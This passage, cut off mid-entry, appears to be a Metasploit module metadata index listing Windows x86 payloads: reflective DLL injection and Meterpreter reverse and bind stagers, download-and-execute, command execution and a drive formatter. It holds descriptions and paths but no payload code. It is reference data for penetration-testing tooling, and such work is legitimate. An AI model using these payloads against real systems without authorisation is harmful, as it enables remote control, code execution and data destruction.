"payload_windows/dllinject/reverse_nonx_tcp": {
"name": "Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)",
"full_name": "payload/windows/dllinject/reverse_nonx_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"vlad902 <vlad902@gmail.com>"
],
"description": "Inject a DLL via a reflective loader. Connect back to the attacker (No NX)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/reverse_nonx_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/dllinject/reverse_ord_tcp": {
"name": "Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)",
"full_name": "payload/windows/dllinject/reverse_ord_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"spoonm <spoonm@no$email.com>"
],
"description": "Inject a DLL via a reflective loader. Connect back to the attacker",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/reverse_ord_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/dllinject/reverse_tcp": {
"name": "Reflective DLL Injection, Reverse TCP Stager",
"full_name": "payload/windows/dllinject/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>"
],
"description": "Inject a DLL via a reflective loader. Connect back to the attacker",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 15:10:26 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/dllinject/reverse_tcp_allports": {
"name": "Reflective DLL Injection, Reverse All-Port TCP Stager",
"full_name": "payload/windows/dllinject/reverse_tcp_allports",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>"
],
"description": "Inject a DLL via a reflective loader. Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/reverse_tcp_allports",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/dllinject/reverse_tcp_dns": {
"name": "Reflective DLL Injection, Reverse TCP Stager (DNS)",
"full_name": "payload/windows/dllinject/reverse_tcp_dns",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"RageLtMan"
],
"description": "Inject a DLL via a reflective loader. Connect back to the attacker",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/reverse_tcp_dns",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/dllinject/reverse_tcp_rc4": {
"name": "Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption, Metasm)",
"full_name": "payload/windows/dllinject/reverse_tcp_rc4",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"mihi",
"RageLtMan"
],
"description": "Inject a DLL via a reflective loader. Connect back to the attacker",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 15:10:26 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/reverse_tcp_rc4",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/dllinject/reverse_tcp_rc4_dns": {
"name": "Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)",
"full_name": "payload/windows/dllinject/reverse_tcp_rc4_dns",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"mihi",
"RageLtMan"
],
"description": "Inject a DLL via a reflective loader. Connect back to the attacker",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/reverse_tcp_rc4_dns",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/dllinject/reverse_tcp_uuid": {
"name": "Reflective DLL Injection, Reverse TCP Stager with UUID Support",
"full_name": "payload/windows/dllinject/reverse_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"OJ Reeves"
],
"description": "Inject a DLL via a reflective loader. Connect back to the attacker with UUID Support",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 15:10:26 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/reverse_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/dllinject/reverse_udp": {
"name": "Reflective DLL Injection, Reverse UDP Stager with UUID Support",
"full_name": "payload/windows/dllinject/reverse_udp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"RageLtMan <rageltman@sempervictus>"
],
"description": "Inject a DLL via a reflective loader. Connect back to the attacker with UUID Support",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-13 14:34:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_udp.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/reverse_udp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/dllinject/reverse_winhttp": {
"name": "Reflective DLL Injection, Windows Reverse HTTP Stager (winhttp)",
"full_name": "payload/windows/dllinject/reverse_winhttp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "Inject a DLL via a reflective loader. Tunnel communication over HTTP (Windows winhttp)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-21 13:53:33 +0000",
"path": "/modules/payloads/stagers/windows/reverse_winhttp.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/reverse_winhttp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/dns_txt_query_exec": {
"name": "DNS TXT Record Payload Download and Execution",
"full_name": "payload/windows/dns_txt_query_exec",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "Performs a TXT query against a series of DNS record(s) and executes the returned payload",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/windows/dns_txt_query_exec.rb",
"is_install_path": true,
"ref_name": "windows/dns_txt_query_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/download_exec": {
"name": "Windows Executable Download (http,https,ftp) and Execute",
"full_name": "payload/windows/download_exec",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "Download an EXE from an HTTP(S)/FTP URL and execute it",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/windows/download_exec.rb",
"is_install_path": true,
"ref_name": "windows/download_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/exec": {
"name": "Windows Execute Command",
"full_name": "payload/windows/exec",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Execute an arbitrary command",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/windows/exec.rb",
"is_install_path": true,
"ref_name": "windows/exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/format_all_drives": {
"name": "Windows Drive Formatter",
"full_name": "payload/windows/format_all_drives",
"rank": 0,
"disclosure_date": null,
"type": "payload",
"author": [
"Ashfaq Ansari <ashfaq_ansari1989@hotmail.com>",
"Ruei-Min Jiang <mike820324@gmail.com>"
],
"description": "This payload formats all mounted disks in Windows (aka ShellcodeOfDeath).\n\n After formatting, this payload sets the volume label to the string specified in\n the VOLUMELABEL option. If the code is unable to access a drive for any reason,\n it skips the drive and proceeds to the next volume.",
"references": [
"URL-http://hacksys.vfreaks.com/research/shellcode-of-death.html",
"URL-https://github.com/hacksysteam/ShellcodeOfDeath"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/windows/format_all_drives.rb",
"is_install_path": true,
"ref_name": "windows/format_all_drives",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/loadlibrary": {
"name": "Windows LoadLibrary Path",
"full_name": "payload/windows/loadlibrary",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>"
],
"description": "Load an arbitrary library path",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/windows/loadlibrary.rb",
"is_install_path": true,
"ref_name": "windows/loadlibrary",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/messagebox": {
"name": "Windows MessageBox",
"full_name": "payload/windows/messagebox",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"corelanc0d3r <peter.ve@corelan.be>",
"jduck <jduck@metasploit.com>"
],
"description": "Spawns a dialog via MessageBox using a customizable title, text & icon",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/windows/messagebox.rb",
"is_install_path": true,
"ref_name": "windows/messagebox",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/bind_hidden_ipknock_tcp": {
"name": "Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager",
"full_name": "payload/windows/meterpreter/bind_hidden_ipknock_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>",
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Listen for a connection. First, the port will need to be knocked from\n the IP defined in KHOST. This IP will work as an authentication method\n (you can spoof it with tools like hping). After that you could get your\n shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n hide the shellcode",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/bind_hidden_ipknock_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/bind_hidden_tcp": {
"name": "Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager",
"full_name": "payload/windows/meterpreter/bind_hidden_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>",
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/bind_hidden_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/bind_ipv6_tcp": {
"name": "Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)",
"full_name": "payload/windows/meterpreter/bind_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Listen for an IPv6 connection (Windows x86)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/bind_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/bind_ipv6_tcp_uuid": {
"name": "Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)",
"full_name": "payload/windows/meterpreter/bind_ipv6_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Listen for an IPv6 connection with UUID Support (Windows x86)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/bind_ipv6_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/bind_named_pipe": {
"name": "Windows Meterpreter (Reflective Injection), Windows x86 Bind Named Pipe Stager",
"full_name": "payload/windows/meterpreter/bind_named_pipe",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"UserExistsError"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Listen for a pipe connection (Windows x86)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-27 19:24:51 +0000",
"path": "/modules/payloads/stagers/windows/bind_named_pipe.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/bind_named_pipe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/bind_nonx_tcp": {
"name": "Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)",
"full_name": "payload/windows/meterpreter/bind_nonx_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"vlad902 <vlad902@gmail.com>"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Listen for a connection (No NX)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/bind_nonx_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/bind_tcp": {
"name": "Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86)",
"full_name": "payload/windows/meterpreter/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Listen for a connection (Windows x86)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_tcp.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/bind_tcp_rc4": {
"name": "Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)",
"full_name": "payload/windows/meterpreter/bind_tcp_rc4",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>",
"mihi",
"RageLtMan"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Listen for a connection",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/bind_tcp_rc4",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/meterpreter/bind_tcp_uuid": {
"name": "Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)",
"full_name": "payload/windows/meterpreter/bind_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Listen for a connection with UUID Support (Windows x86)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/bind_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/find_tag": {
"name": "Windows Meterpreter (Reflective Injection), Find Tag Ordinal Stager",
"full_name": "payload/windows/meterpreter/find_tag",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Use an established connection",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/findtag_ord.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/find_tag",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/reverse_hop_http": {
"name": "Windows Meterpreter (Reflective Injection), Reverse Hop HTTP/HTTPS Stager",
"full_name": "payload/windows/meterpreter/reverse_hop_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"scriptjunkie <scriptjunkie@scriptjunkie.us>",
"bannedit <bannedit@metasploit.com>",
"hdm <x@hdm.io>"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). \n Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload\n data/hop/hop.php to the PHP server you wish to use as a hop.",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_hop_http.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/reverse_hop_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/reverse_http": {
"name": "Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (wininet)",
"full_name": "payload/windows/meterpreter/reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Tunnel communication over HTTP (Windows wininet)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-12-08 06:24:02 +0000",
"path": "/modules/payloads/stagers/windows/reverse_http.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/reverse_http_proxy_pstore": {
"name": "Windows Meterpreter (Reflective Injection), Reverse HTTP Stager Proxy",
"full_name": "payload/windows/meterpreter/reverse_http_proxy_pstore",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Tunnel communication over HTTP",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/reverse_http_proxy_pstore",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/reverse_https": {
"name": "Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (wininet)",
"full_name": "payload/windows/meterpreter/reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Tunnel communication over HTTPS (Windows wininet)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-12-08 06:24:02 +0000",
"path": "/modules/payloads/stagers/windows/reverse_https.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/reverse_https_proxy": {
"name": "Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy",
"full_name": "payload/windows/meterpreter/reverse_https_proxy",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>",
"corelanc0d3r <peter.ve@corelan.be>",
"amaloteaux <alex_maloteaux@metasploit.com>"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Tunnel communication over HTTP using SSL with custom proxy support",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-21 13:53:33 +0000",
"path": "/modules/payloads/stagers/windows/reverse_https_proxy.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/reverse_https_proxy",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/reverse_ipv6_tcp": {
"name": "Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)",
"full_name": "payload/windows/meterpreter/reverse_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker over IPv6",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
